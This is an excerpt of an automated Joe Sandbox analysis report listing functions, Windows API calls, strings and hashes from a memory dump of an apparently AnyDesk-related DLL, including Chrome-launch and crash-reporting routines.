                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 69C3E7DB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Directory$FileModuleNameSystemWindows
                                                                                                                                                                                                                                                  • String ID: Internet Explorer$Microsoft$ProgramW6432$Quick Launch
                                                                                                                                                                                                                                                  • API String ID: 592745672-224070340
                                                                                                                                                                                                                                                  • Opcode ID: c060a6734335728c84555876baa61a41167b6dadc8a4446ac1fdecc6d9ba436a
                                                                                                                                                                                                                                                  • Instruction ID: 9568d229e6a76ef374b51b542943e724728479dbd88036626e006488d66878fa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c060a6734335728c84555876baa61a41167b6dadc8a4446ac1fdecc6d9ba436a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4C1B034268310ABE614DB64EC55FAEB7E8BF81744F90492DF2519B0D0FB71A909CB63
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C21E30 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 190fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 69C21E54
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC31: std::invalid_argument::invalid_argument.LIBCONCRT ref: 69C3FC3D
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC31: __CxxThrowException@8.LIBVCRUNTIME ref: 69C3FC4B
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C21F48
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,00000004,00000003,00000000,00000004,00000080,00000000), ref: 69C21F81
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,00000004,00000003,00000000,00000004,00000080,00000000,?,debug.log), ref: 69C22032
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Create$Exception@8ModuleNameThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: \$debug.log$invalid string position
                                                                                                                                                                                                                                                  • API String ID: 3749634790-2581654245
                                                                                                                                                                                                                                                  • Opcode ID: 357081b807ed9c750bd27df56aef875ac7788d23b681d0279dbacf4876f68b44
                                                                                                                                                                                                                                                  • Instruction ID: 573e03dd2243737405e0dbe926cfcd0b20736da0babcdde007835d3a4f83de5c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 357081b807ed9c750bd27df56aef875ac7788d23b681d0279dbacf4876f68b44
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34510574A003189FDB24DF74EC55BAE77B4BF01718F504619E922AB2D0FB71AA06CB51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5EEFE Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 69C5EF1F
                                                                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Google\No Chrome Offer Until,00000000,00000000,00000000,0002001F,00000000,?,?,00000000), ref: 69C5EF81
                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 69C5EFD4
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 69C5F03D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • SOFTWARE\Google\No Chrome Offer Until, xrefs: 69C5EF6F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseCreateFileModuleNameQueryValue
                                                                                                                                                                                                                                                  • String ID: SOFTWARE\Google\No Chrome Offer Until
                                                                                                                                                                                                                                                  • API String ID: 2815806617-1538224596
                                                                                                                                                                                                                                                  • Opcode ID: f49bd3686145c2fb2060ff2561dceec454e2c8878d5f4d8753fe62c8b4d3b27e
                                                                                                                                                                                                                                                  • Instruction ID: cf39ffc42617b61cd5baf187253e339af1e9b358d25ba3ef52fda5f475b64405
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f49bd3686145c2fb2060ff2561dceec454e2c8878d5f4d8753fe62c8b4d3b27e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 423132B5A40228AFDB20CF11DC49FEAB7BCEB45310F8041AAF60A96141E7715A95CF69
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C66B55 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(69C66322,69C66322,0000001C,?,00000000,00000001), ref: 69C66B7A
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C66B93
                                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(69C66322), ref: 69C66BE1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C66BFA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66BA0, 69C66C07
                                                                                                                                                                                                                                                  • SetEndOfFile, xrefs: 69C66C1A
                                                                                                                                                                                                                                                  • SetFilePointerEx, xrefs: 69C66BB3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$Pointer
                                                                                                                                                                                                                                                  • String ID: SetEndOfFile$SetFilePointerEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 1697706070-3222943609
                                                                                                                                                                                                                                                  • Opcode ID: fbdadac08709b80108ec57b0bed737736f7402103d5f8840fa2870fc72b25824
                                                                                                                                                                                                                                                  • Instruction ID: 075edeff228beb803e95bf72a4fd6e82f43836f6ae7388983b9a7f3b8f2e20f9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbdadac08709b80108ec57b0bed737736f7402103d5f8840fa2870fc72b25824
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A215735904B08BAEB14CFA0FDD2FAD7768BF01358F809455E6043A0D1FB3255865914
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5DDCB Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?), ref: 69C5DE77
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 69C5DEFA
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 69C5DF8D
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 69C5DFA4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4C844: HeapAlloc.KERNEL32(00000000,0000010C,00000004,?,69C4C8A7,?,00000000,?,69C57B70,0000010C,00000004,?,0000010C,?,?,69C4DB9D), ref: 69C4C876
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 69C5E020
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C5E04B
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C5E057
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$__freea$AllocHeapInfo
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2171645-0
                                                                                                                                                                                                                                                  • Opcode ID: 50c4e2176e6e247271a7bc8e13c80de61e99358da63e3ee2f6903d6932b01917
                                                                                                                                                                                                                                                  • Instruction ID: 563c7b4d5bd22db1ffdda85bb509174dc049a296ce414183c30a2e5c524bceb6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50c4e2176e6e247271a7bc8e13c80de61e99358da63e3ee2f6903d6932b01917
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B91D271E00316ABDF10CE64E840EEE7BB5AB59794F05862AE812E7181F775D870CB68
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C59DD6 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: f61108f0a8b825492974f0b247afc1dfe8301811278908e8b899d6613912d57a
                                                                                                                                                                                                                                                  • Instruction ID: 1a1887a081cd9580d4a068b2f1a62aebc8c8671ad9425f8572c6e2325df51f75
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f61108f0a8b825492974f0b247afc1dfe8301811278908e8b899d6613912d57a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E61D3B5E04605AFDB20CF68E841B9ABBF5FF45710F5081AAEC45EB280F77099618B54
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C49040 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,69C497B5,?,?,?,?,?,?), ref: 69C49082
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 69C490FD
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 69C49118
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 69C4913E
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,69C497B5,00000000,?,?,?,?,?,?,?,?,?,69C497B5,?), ref: 69C4915D
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,69C497B5,00000000,?,?,?,?,?,?,?,?,?,69C497B5,?), ref: 69C49196
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                  • Opcode ID: 2d6ed89d5ed36f3526697052d18092fe9b23a46de53c633a2160b3411bf30de4
                                                                                                                                                                                                                                                  • Instruction ID: b946b100b0677b4ea3fc3f26c25a8fa2b84d0c874464d6033297481f9cb2c565
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d6ed89d5ed36f3526697052d18092fe9b23a46de53c633a2160b3411bf30de4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C751E575E002599FDF00CFA8D945AEEBBF8FF49B10F10411AE955E7291E730AA41CB61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3B420 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: false$null$true
                                                                                                                                                                                                                                                  • API String ID: 0-2913297407
                                                                                                                                                                                                                                                  • Opcode ID: a6489fcf39540489a4fb520f7f300ca0056f60a4cd6b0dfb3c318ea86b050e82
                                                                                                                                                                                                                                                  • Instruction ID: 084b49dffa0c13df5e702cc2b103e7bf8b233e43442227a9b56ec9dec1476a51
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6489fcf39540489a4fb520f7f300ca0056f60a4cd6b0dfb3c318ea86b050e82
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C51E2799047499FD710CF78E441BAABBF5FF45304F0086AAC8999B602F731A64ACF51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C602FF Relevance: 10.6, APIs: 7, Instructions: 141sleepCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?), ref: 69C60349
                                                                                                                                                                                                                                                  • CoUninitialize.OLE32(00000001,00000000,?,00000000), ref: 69C6038E
                                                                                                                                                                                                                                                  • LaunchGoogleChrome.GCAPI(00000001,00000000,?,00000000), ref: 69C60381
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: CoInitializeEx.OLE32(00000000,00000002), ref: 69C60024
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000002,00000000,00000040,00000000), ref: 69C60039
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: GetCurrentProcessId.KERNEL32(?), ref: 69C60064
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: GetShellWindow.USER32 ref: 69C60087
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: GetWindowThreadProcessId.USER32(00000000), ref: 69C6008E
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: LocalFree.KERNEL32(?), ref: 69C600A2
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: CoUninitialize.OLE32 ref: 69C602D1
                                                                                                                                                                                                                                                  • CoUninitialize.OLE32(00000001,00000000,?,00000000), ref: 69C603AF
                                                                                                                                                                                                                                                  • LaunchGoogleChrome.GCAPI ref: 69C603C9
                                                                                                                                                                                                                                                  • EnumWindows.USER32(69C5F056,?), ref: 69C6044C
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 69C6046A
                                                                                                                                                                                                                                                    • Part of subcall function 69C288E0: new.LIBCMT ref: 69C28900
                                                                                                                                                                                                                                                    • Part of subcall function 69C288E0: new.LIBCMT ref: 69C2893C
                                                                                                                                                                                                                                                    • Part of subcall function 69C288E0: new.LIBCMT ref: 69C28979
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeUninitialize$ChromeGoogleLaunchProcessWindow$CurrentEnumFreeLocalSecurityShellSleepThreadWindows
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1477501081-0
                                                                                                                                                                                                                                                  • Opcode ID: 28b74b9a289c749cb37e95cf3d47b9633d27fd90ae2a72c6f552fc9c2e475b42
                                                                                                                                                                                                                                                  • Instruction ID: 4845401c43c0e034f4de401853a0cc029cf4a4625bf8e1948ce021a16bf58474
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28b74b9a289c749cb37e95cf3d47b9633d27fd90ae2a72c6f552fc9c2e475b42
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C51BF35D012589FCB00CFA5F991BEDBBB8BF05324F10412AE921B71A1FBB05909CB61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C6767F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 139COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%,00000000,00000000,00000000,?,?,?,?,?,?,?,69C67616,?,69C6FB90,000000FF,69C78A68), ref: 69C6769E
                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%,00000000,00000000,?,?,?,?,?,69C67616,?,69C6FB90,000000FF,69C78A68,00000000,Software\Google\Update\ClientState), ref: 69C676C8
                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000000,00000000,?,?,?,?,?,69C67616,?,69C6FB90,000000FF,69C78A68,00000000,Software\Google\Update\ClientState), ref: 69C676E9
                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000001,00000000,?,?,?,?,?,69C67616,?,69C6FB90,000000FF,69C78A68,00000000,Software\Google\Update\ClientState), ref: 69C67718
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandPathStringsTemp
                                                                                                                                                                                                                                                  • String ID: %LOCALAPPDATA%$User Data
                                                                                                                                                                                                                                                  • API String ID: 442586119-612141592
                                                                                                                                                                                                                                                  • Opcode ID: ebd49cc4cbeeb24c22015eafb82e9aa879f58a7ae5f2627a67df2b1a18d8ed12
                                                                                                                                                                                                                                                  • Instruction ID: ae01698d984d3ba3de1908d78b05b3d7a12cb5cb1201bea7c0f09ad3e8eef8dd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebd49cc4cbeeb24c22015eafb82e9aa879f58a7ae5f2627a67df2b1a18d8ed12
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 003142357002106BDB149A38BDE9E7F77ACEF82B64B10952EE806DB190FF20DC0182B0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5F1A9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?,?,00000000,00000000,?,69C5EF48,?,?,00000208), ref: 69C5F1D9
                                                                                                                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,00002000,?,?,?,00000208), ref: 69C5F217
                                                                                                                                                                                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,00002000,?,?,?,00000208), ref: 69C5F24A
                                                                                                                                                                                                                                                  • VerQueryValueW.VERSION(?,?,?,?,\VarFileInfo\Translation,?,?,?,?,00002000,?,?,?,00000208), ref: 69C5F2C1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • \VarFileInfo\Translation, xrefs: 69C5F23E
